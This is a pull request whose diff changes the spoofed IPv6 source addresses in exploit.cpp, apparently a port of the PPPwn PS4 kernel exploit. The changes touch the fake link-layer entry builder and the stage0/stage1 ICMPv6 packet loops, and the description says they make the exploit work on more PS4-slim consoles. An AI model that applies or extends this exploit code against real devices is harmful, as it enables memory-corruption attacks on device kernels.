### PR TITLE
Use IPv6 address that works on all devices. Thanks to Borris-ta.

### DIFF
--- a/src/exploit.cpp
+++ b/src/exploit.cpp
@@ -50,7 +50,7 @@
 
 const static std::string SOURCE_MAC = "41:41:41:41:41:41";
 const static std::string SOURCE_IPV4 = "41.41.41.41";
-const static std::string SOURCE_IPV6 = "fe80::4141:4141:4141:4141";
+const static std::string SOURCE_IPV6 = "fe80::9f9f:41ff:9f9f:41ff";
 
 const static std::string TARGET_IPV4 = "42.42.42.42";
 
@@ -550,7 +550,7 @@ std::vector<uint8_t> Exploit::build_fake_lle(Exploit *self) {
     V32(fake_lle, 0xC4, 0);  // sin6_flowinfo
     // sin6_addr
     V64BE(fake_lle, 0xC8, 0xfe80000100000000);
-    V64BE(fake_lle, 0xD0, 0x4141414141414141);
+    V64BE(fake_lle, 0xD0, 0x9f9f41ff9f9f41ff);
     V32(fake_lle, 0xD8, 0);  // sin6_scope_id
 
     // pad
@@ -737,7 +737,7 @@ int Exploit::stage0() {
         }
 
         std::stringstream sourceIpv6;
-        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":4141:4141:4141";
+        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
         {
             auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,
                                                       pcpp::IPv6Address(sourceIpv6.str()), this->target_ipv6);
@@ -860,7 +860,7 @@ int Exploit::stage1() {
 
         sourceIpv6.clear();
         sourceIpv6.str("");
-        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":4141:4141:4141";
+        sourceIpv6 << "fe80::" << std::setfill('0') << std::setw(4) << std::hex << i << ":41ff:9f9f:41ff";
 
         {
             auto &&packet = PacketBuilder::icmpv6Echo(this->source_mac, this->target_mac,


### PR DESCRIPTION
Updated exploit.cpp according to original PPPwn repository to make the exploit working on some previously non-working PS4-slim.

Thanks to TheOfficialFlow and Borris-ta for their findings.